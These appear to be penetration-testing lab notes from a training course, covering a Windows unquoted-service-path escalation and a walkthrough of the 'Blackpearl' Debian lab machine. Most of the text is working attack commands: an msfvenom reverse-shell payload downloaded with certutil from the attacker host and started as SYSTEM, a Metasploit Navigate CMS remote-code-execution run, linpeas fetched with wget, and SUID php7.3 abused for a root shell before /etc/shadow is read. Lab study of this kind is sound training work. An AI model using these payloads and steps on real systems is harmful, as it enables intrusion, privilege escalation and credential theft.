certutil.exe -urlcache -f http://192.168.31.131/winpeas.exe winpeas.exe
# the file will be copied to the target machine
# Run winPEAS
winpeas.exe
- Look for useful (red color) information, quick wins for privilege escalation
Unquoted service paths
- Unquoted Service Paths | Red Team Notes
- Abuse misconfigured services: when the path to the service binary is not quoted and contains spaces, Windows tries each space-delimited prefix as an executable (C:\Program.exe, C:\Program Files (x86)\Wise\Wise.exe, ...) before the real one, so a binary planted at one of those paths is started with the service's privileges
WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Administrators [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\Wise\Wise Care 365 (Administrators [AllAccess])
- Drop an exploit binary into the
C:\Program Files (x86)\Wise\
directory
# Generate an exploit
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.31.131 LPORT=7777 -f exe > Wise.exe
python3 -m http.server 80
# New terminal
nc -nvlp 7777
# Target reverse shell
cd C:\Program Files (x86)\Wise\
certutil.exe -urlcache -f http://192.168.31.131/Wise.exe Wise.exe
# Stop the running service
sc stop WiseBootAssistant
sc query WiseBootAssistant
# on restart the service control manager resolves the unquoted path again and launches Wise.exe as the service account
sc start WiseBootAssistant
- Reverse shell as SYSTEM on the port 7777 listener
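Why the payload is named Wise.exe and dropped into C:\Program Files (x86)\Wise\ follows from the lookup order Windows uses for an unquoted ImagePath. The block below is an added example written for these notes, not winPEAS code: given the ImagePath winPEAS reported, it lists the hijack candidates in the order the service control manager tries them and, using a constructed list of directories assumed writable (what icacls or winPEAS would report), picks the first one an attacker could plant.

```python
import ntpath


def hijack_candidates(image_path):
    """Paths the service control manager tries, in order, for an unquoted ImagePath
    (pass the path without arguments). A quoted path yields exactly one candidate."""
    p = image_path.strip()
    if p.startswith('"'):
        return [p.split('"')[1]]
    candidates = []
    for i, ch in enumerate(p):
        if ch == " ":
            prefix = p[:i]
            # CreateProcess appends .exe only when the prefix has no extension
            candidates.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    candidates.append(p)  # the real binary, tried last
    return candidates


def first_plantable(image_path, writable_dirs):
    """First candidate (excluding the real binary) whose directory we can write to.
    writable_dirs is what icacls/winPEAS reported; here it is a constructed list."""
    writable = {d.rstrip("\\").lower() for d in writable_dirs}
    for c in hijack_candidates(image_path)[:-1]:
        if ntpath.dirname(c).rstrip("\\").lower() in writable:
            return c
    return None


WISE = r"C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe"  # ImagePath from the winPEAS output

if __name__ == "__main__":
    for c in hijack_candidates(WISE):
        print(c)
    print("plant at:", first_plantable(WISE, ["C:\\Users\\butler", "C:\\Program Files (x86)\\Wise"]))
```

The fix is the first branch of `hijack_candidates`: quoting the ImagePath (`sc config WiseBootAssistant binPath= "\"C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe\""`) collapses the candidate list to the real binary, which is what winPEAS is checking when it reports "No quotes and Space detected".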
O.S. - Debian 10
Credentials:
root:tcm
sudo arp-scan -l
# Blackpearl IP 192.168.31.129
mkdir -p ~/tcm/peh/blackpearl
cd ~/tcm/peh/blackpearl/
sudo nmap -p- -A -T4 192.168.31.129 -oA blackpearl
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 66:38:14:50:ae:7d:ab:39:72:bf:41:9c:39:25:1a:0f (RSA)
| 256 a6:2e:77:71:c6:49:6f:d5:73:e9:22:7d:8b:1c:a9:c6 (ECDSA)
|_ 256 89:0b:73:c1:53:c8:e1:88:5e:c3:16:de:d1:e5:26:0d (ED25519)
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u5-Debian
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
MAC Address: 00:0C:29:35:E9:A7 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.93 ms 192.168.31.129
- Navigate to http://192.168.31.129
- nginx default page
- Proceed with some directory busting
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.31.129/FUZZ
secret [Status: 200, Size: 209, Words: 31, Lines: 9, Duration: 13ms]
- Download the http://192.168.31.129/secret file
➡️ dnsrecon
dnsrecon -r 127.0.0.0/24 -n 192.168.31.129 -d test
[*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255
[+] PTR blackpearl.tcm 127.0.0.1
[+] 1 Records Found
- Add blackpearl.tcm to Kali's /etc/hosts
sudo nano /etc/hosts
# Add
192.168.31.129 blackpearl.tcm
- Navigate to http://blackpearl.tcm
- phpinfo webpage
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://blackpearl.tcm/FUZZ
navigate [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 0ms]
[Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 6ms]
- Navigate to http://blackpearl.tcm/navigate
- Navigate CMS v2.8
- Google for "navigate cms exploit" - Metasploit's navigate_cms_rce module covers it:
This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication. The module then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8.
msfconsole
search navigate cms
use exploit/multi/http/navigate_cms_rce
set rhosts 192.168.31.129
set vhost blackpearl.tcm
show targets
run
# meterpreter >
shell
whoami
- Generate a TTY Shell
which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/bash")'
# Kali
cd ~/tools # linpeas.sh was downloaded here in the Academy section
python3 -m http.server 80
# Target reverse shell
cd /tmp
wget http://192.168.31.131/linpeas.sh
- Look for usernames and passwords, reading the output bottom up (red and yellow highlights first)
# List owned files with SUID permissions
find / -type f -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/php7.3
/usr/bin/su
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
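The `find` above lists every SUID binary, but the skill is spotting the one that should not be there: /usr/bin/php7.3 is an interpreter, and the rest are the stock Debian set. The block below is an added example written for these notes, not linPEAS code: it does the same walk in Python, skipping pseudo-filesystems, and subtracts an assumed Debian 10 baseline so the odd one stands out. `demo()` builds a constructed tree with a fake SUID php7.3 so the example runs without root and without touching the real filesystem.

```python
import os
import stat
import tempfile

# Assumed stock Debian 10 SUID set (the find output above plus sudo/fusermount);
# anything outside it deserves a look on GTFOBins.
DEBIAN_BASELINE = {
    "dbus-daemon-launch-helper", "dmcrypt-get-device", "ssh-keysign", "umount",
    "newgrp", "mount", "su", "chfn", "passwd", "chsh", "gpasswd", "sudo", "fusermount",
}


def find_suid(root="/"):
    """Regular files under root with the setuid bit set, as (path, owner uid).
    lstat is used so a symlink to a SUID binary is not reported twice."""
    hits = []
    skip = {"/proc", "/sys", "/dev"}
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return sorted(hits)


def unusual(hits, baseline=DEBIAN_BASELINE):
    """Drop the expected set so the odd one (php7.3 on Blackpearl) stands out."""
    return [(p, uid) for p, uid in hits if os.path.basename(p) not in baseline]


def demo():
    """Constructed tree: a SUID 'php7.3' and 'passwd' next to a normal 'ls'."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("php7.3", 0o4755), ("ls", 0o755), ("passwd", 0o4755)):
        p = os.path.join(bindir, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)
    return root, find_suid(root)


if __name__ == "__main__":
    for path, uid in unusual(find_suid("/")):
        print(f"{path} (owner uid {uid})")
```

On the target, `unusual(find_suid("/"))` returns only /usr/bin/php7.3 owned by uid 0, which is the GTFOBins lookup that follows. The owner uid matters: a SUID file owned by a non-root user only gets you that user.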
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
# php7.3 is SUID root: pcntl_exec replaces the process with /bin/sh -p, and -p keeps the effective UID 0 instead of dropping it (see the id output below)
whoami
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
cd /root
cat flag.txt
cat /etc/shadow
...
🔗 For more in depth Privilege Escalation, check TCM courses here: